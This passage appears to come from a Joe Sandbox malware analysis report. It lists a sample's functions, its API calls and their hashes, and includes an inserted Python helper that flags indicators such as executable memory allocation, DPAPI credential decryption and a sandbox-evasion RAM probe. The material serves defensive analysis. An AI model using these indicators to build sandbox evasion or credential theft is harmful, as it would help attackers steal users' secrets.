                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E57F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: @
                    • API String ID: 292159236-2766056989
                    • Opcode ID: 5ef6eaf41adedcf0f6d2c5c3fccc73c6b897e4ba6fac9e713344d5e36b94ac60
                    • Instruction ID: d3c94e936d2adf19700db77f83480d06950029b45db2a9c999cc1b1a642500d1
                    • Opcode Fuzzy Hash: 5ef6eaf41adedcf0f6d2c5c3fccc73c6b897e4ba6fac9e713344d5e36b94ac60
                    • Instruction Fuzzy Hash: 3D419CB20097149FD711CF14C845B2BB7E8EF85368F554A1DF5A49B2E0E3B4D908CBA2
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E5CD5
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E5D27
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: @
                    • API String ID: 292159236-2766056989
                    • Opcode ID: 9285d59e57a99cade7a1b607fa97a38b7839e18b25e81e63b13b090408cc04b8
                    • Instruction ID: d0875e057a360959373b75700a17dbab51fae63107a15318b4fb097a1e95cdab
                    • Opcode Fuzzy Hash: 9285d59e57a99cade7a1b607fa97a38b7839e18b25e81e63b13b090408cc04b8
                    • Instruction Fuzzy Hash: 2D315BB11093159FD300CF14C844B2BBBE8FF88358F048A2CF9A49B3A0D3B49948CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E59F4
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E5A53
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: $
                    • API String ID: 292159236-3993045852
                    • Opcode ID: e8adc466331c8b1d8802d5da424aefb1964e30d69a2ada2e62ce07b4b218c4c7
                    • Instruction ID: 2e7f200ee5e66e21fa104d0b91bd80b8da238c04694800ee3680d00aa8631f6d
                    • Opcode Fuzzy Hash: e8adc466331c8b1d8802d5da424aefb1964e30d69a2ada2e62ce07b4b218c4c7
                    • Instruction Fuzzy Hash: C4319F71208314AFD311CF19CC41B6BBBE8EB84728F114A2DFAA49B3D0D7B19904CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003C8EF1
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003C8F58
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: ,
                    • API String ID: 292159236-3772416878
                    • Opcode ID: 73d2d1321c5c72839420fd2f5fab1ad9882743a3a3dfef2dcf5ab76e3377136b
                    • Instruction ID: d19bf84612fc339c53390399a90f651f900c490a8247d51c05758e3eecb91640
                    • Opcode Fuzzy Hash: 73d2d1321c5c72839420fd2f5fab1ad9882743a3a3dfef2dcf5ab76e3377136b
                    • Instruction Fuzzy Hash: 1A314772109304AFD311CF14DC40B2BBBE9FB88754F148A1DFAA89B390D7B19944CBA2
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C475E
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003C47A2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: MyC
                    • API String ID: 292159236-2519405844
                    • Opcode ID: ccd4de19412878fc7e62474c5016c80e60ffe9b75ee4ae4dcd6e8f454510e5d8
                    • Instruction ID: 8b41674cd75270c51352c382fbf0a6e088eabec8ee46b5bd233ade236699a137
                    • Opcode Fuzzy Hash: ccd4de19412878fc7e62474c5016c80e60ffe9b75ee4ae4dcd6e8f454510e5d8
                    • Instruction Fuzzy Hash: 6A317EB19111199FDF15CF94D881BEEBBB8FB08314F140219EA22FB390D7B46945CBA4
                    APIs
                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 003D3876
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: InstalledMemoryPhysicallySystem
                    • String ID: U;Gy
                    • API String ID: 3960555810-1665677991
                    • Opcode ID: 8c797a3c7461ddc060b3b0c4bfa680badbb74ea780a2bf0dd08a012b32d89799
                    • Instruction ID: ab51ea6a11fe68dce61cc055f9224a54beae40de5b3e079e7bfa4d5dc401aac4
                    • Opcode Fuzzy Hash: 8c797a3c7461ddc060b3b0c4bfa680badbb74ea780a2bf0dd08a012b32d89799
                    • Instruction Fuzzy Hash: 37522A71104B808AE766CF35D0A87A3BBE1BF16304F54895DD0FB8B782D779A909CB51
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003C51D9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: CryptDataUnprotect
                    • String ID: 6
                    • API String ID: 834300711-498629140
                    • Opcode ID: a0eb151e3ea132758d25629e7a3d3590acbd5e95642af02772e2ddf3e51001bf
                    • Instruction ID: 84320008c419f24eec41ba1fbe21989e09c463c903fc75d139ccfb6f344b4641
                    • Opcode Fuzzy Hash: a0eb151e3ea132758d25629e7a3d3590acbd5e95642af02772e2ddf3e51001bf
                    • Instruction Fuzzy Hash: 9D61BCB15083819FC721CF28C491B5BBBE1BB95308F448A2DE4E98B382D735E945CB92
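The API call lines in this listing carry the arguments the sandbox observed, which is enough to triage several functions without opening the disassembly: the NtAllocateVirtualMemory calls pass AllocationType 00003000 and Protect 00000040 (MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE, the classic writable-and-executable scratch buffer), NtFreeVirtualMemory passes FreeType 00008000 (MEM_RELEASE), CryptUnprotectData is the DPAPI call that unwraps secrets browsers protect with the user's key, and GetPhysicallyInstalledSystemMemory is a cheap environment probe. The helper below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses call lines in the exact format shown on this page (copied into SAMPLE_CALLS as constructed input), decodes the flag arguments with the fixed Windows SDK constant values, and tags the calls an analyst would look at first. It assumes the sandbox prints arguments in the native prototype's order and does not attempt to interpret the 000000FF handle value.

```python
import re
from dataclasses import dataclass

# Constructed sample input: API call lines copied from the Joe Sandbox listing on this page.
SAMPLE_CALLS = """\
• NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E5795
• NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E57F2
• NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C475E
• NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E5D27
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 003D3876
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003C51D9
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000002), ref: 003E282D
"""

# Api.Module(arg,arg,...), ref: hexaddr  -- the shape of every call line in the report.
CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Fixed values from the Windows SDK headers (winnt.h).
ALLOC_FLAGS = {
    0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
    0x8000: "MEM_RELEASE", 0x100000: "MEM_TOP_DOWN", 0x400000: "MEM_RESET",
}
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}


@dataclass
class Call:
    api: str
    module: str
    args: list  # raw hex strings; "?" means the sandbox could not resolve the value
    ref: int    # address of the call site inside the dumped image


def parse_calls(text):
    """Parse the '• Api.Module(args), ref: addr' lines; unparseable lines are skipped."""
    calls = []
    for line in text.splitlines():
        line = line.strip().lstrip("•").strip()
        m = CALL_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def arg_int(call, index):
    """Argument as int, or None when it is missing or the sandbox printed '?'."""
    if index >= len(call.args) or call.args[index] == "?":
        return None
    return int(call.args[index], 16)


def decode_flags(value, table):
    """Render a bit-flag value as 'A|B'; bits not in the table are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"


def describe_protect(prot):
    """Low byte is the page protection; higher bits are modifiers such as PAGE_GUARD."""
    base, mods = prot & 0xFF, prot & ~0xFF
    name = PAGE_PROTECT.get(base, hex(base))
    return name if not mods else f"{name}|{hex(mods)}"


def triage(calls):
    """Return (ref, tag, detail) for the calls worth a second look."""
    findings = []
    for c in calls:
        if c.api == "NtAllocateVirtualMemory":
            alloc, prot = arg_int(c, 4), arg_int(c, 5)   # AllocationType, Protect
            if prot is not None and (prot & 0xFF) in EXECUTABLE:
                alloc_s = "?" if alloc is None else decode_flags(alloc, ALLOC_FLAGS)
                findings.append((c.ref, "exec-alloc", f"{alloc_s}, {describe_protect(prot)}"))
        elif c.api == "NtMapViewOfSection":
            prot = arg_int(c, 9)                          # Win32Protect
            findings.append((c.ref, "section-map", "?" if prot is None else describe_protect(prot)))
        elif c.api == "CryptUnprotectData":
            findings.append((c.ref, "dpapi-decrypt", "DPAPI blob decryption (browser credential stores)"))
        elif c.api == "GetPhysicallyInstalledSystemMemory":
            findings.append((c.ref, "env-probe", "physical RAM query, commonly used as a sandbox check"))
    return findings


def summarize(findings):
    """Count findings per tag so a report can be compared across samples."""
    counts = {}
    for _, tag, _ in findings:
        counts[tag] = counts.get(tag, 0) + 1
    return counts


if __name__ == "__main__":
    for ref, tag, detail in triage(parse_calls(SAMPLE_CALLS)):
        print(f"{ref:08X}  {tag:<14} {detail}")
```

Run on the lines above it reports two executable allocations (MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE), one read-only section mapping, the DPAPI decryption and the RAM probe. Extending the table of decoded arguments to further APIs in the report (for example the NtFreeVirtualMemory FreeType field) is a matter of adding a branch, and the same parser works on the API lines of other Joe Sandbox function listings that use this format.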
                    APIs
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E2C36
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: FreeMemoryVirtual
                    • String ID: JM
                    • API String ID: 3963845541-1126336605
                    • Opcode ID: 1164378ab9268167fd2154cffd2a83ca65b75b932685fff03604fa06646d9405
                    • Instruction ID: 23e4a067cc9ad55d2dc08d81f85cb8447eeb3e6d0301cf96df2d910466a40190
                    • Opcode Fuzzy Hash: 1164378ab9268167fd2154cffd2a83ca65b75b932685fff03604fa06646d9405
                    • Instruction Fuzzy Hash: 863131791047818BD71ACF26DC90B273BA8BB06329F28475DC4A3CBAE2C634E44AC704
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: Close
                    • String ID: `LC
                    • API String ID: 3535843008-76481041
                    • Opcode ID: 6839dc090dbf2a681d5c8bbdbb3522ce9094d1e822812731491f082b68f2a2f4
                    • Instruction ID: 80df2397a0c82458558e534fa5cc4728889c2c2019bf28c2c465e33ea42b3251
                    • Opcode Fuzzy Hash: 6839dc090dbf2a681d5c8bbdbb3522ce9094d1e822812731491f082b68f2a2f4
                    • Instruction Fuzzy Hash: 30E01276484014EBCB07FB68FC42D343665EFA9305B001570E802D5272DB635A28DE15
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b759b0c3bde687b499e1b6fbd866033e0cea544f63f41cbdea36ec58838773e5
                    • Instruction ID: 43efc337ada19a1d44aaf529260f18975b7e4b30eb6e4199d200d5dd58a26b8e
                    • Opcode Fuzzy Hash: b759b0c3bde687b499e1b6fbd866033e0cea544f63f41cbdea36ec58838773e5
                    • Instruction Fuzzy Hash: 1E618D31109B818FD323CB38C850BA3BBF5BF56304F488A9ED1EACB292D7656509CB50
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E58B5
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E590D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 187d45e30820cc13a54d2e177eb53af294a06cc3974e0718c9d3afefaab82dac
                    • Instruction ID: 1a681a156da31d90a0da75c8914740c4b5deb3ac0373e626f7e9bf3ac916ed11
                    • Opcode Fuzzy Hash: 187d45e30820cc13a54d2e177eb53af294a06cc3974e0718c9d3afefaab82dac
                    • Instruction Fuzzy Hash: C2318F75208355AFD711CF14D845B6FB7E8EB84324F01861DF9A4973D0D7B09A08CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C4DAC
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 003C4E03
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: ac38286d634064dd3f80a967dd5cc97a424d33990ff0afc86ea42b51500f4dcc
                    • Instruction ID: 9b4e033720cd6f7b39a6bc914667afeb98ba893a223470d07fd794ca27a1f0c5
                    • Opcode Fuzzy Hash: ac38286d634064dd3f80a967dd5cc97a424d33990ff0afc86ea42b51500f4dcc
                    • Instruction Fuzzy Hash: FD3143B1109345AFD756CF14C885B6BBBF9FB88314F405A1CFAA58B2A0D7B1D844CB52
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C54D9
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 003C552D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: a31444d4b2bcebeaac0d17e077bd837d143eb5cd98272b540870e809e81cdf1d
                    • Instruction ID: c625eeed5aa3c38dc710087baa606b64e614e5cf4c772f27c6cff6371000e100
                    • Opcode Fuzzy Hash: a31444d4b2bcebeaac0d17e077bd837d143eb5cd98272b540870e809e81cdf1d
                    • Instruction Fuzzy Hash: 07318BB11193409FD325CF18C881B6BB7E8BB84318F445A2CF6A5DB3A0D7B4D844CB56
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003C4321
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C4365
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: dce35456e2f6c61bee21f4a4b019d6d1e3c5ad63379e256f47f1aa6202e2c2e5
                    • Instruction ID: 0701351a5f35d3b96aab9f46e639e583056185c3b751686e4fd0440f99269a58
                    • Opcode Fuzzy Hash: dce35456e2f6c61bee21f4a4b019d6d1e3c5ad63379e256f47f1aa6202e2c2e5
                    • Instruction Fuzzy Hash: 8F219A71109311AFD311CF18D885B2FBBE8EB84764F118A1CF9A58B390D7B59C48CBA2
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C5AE5
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 003C5B39
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
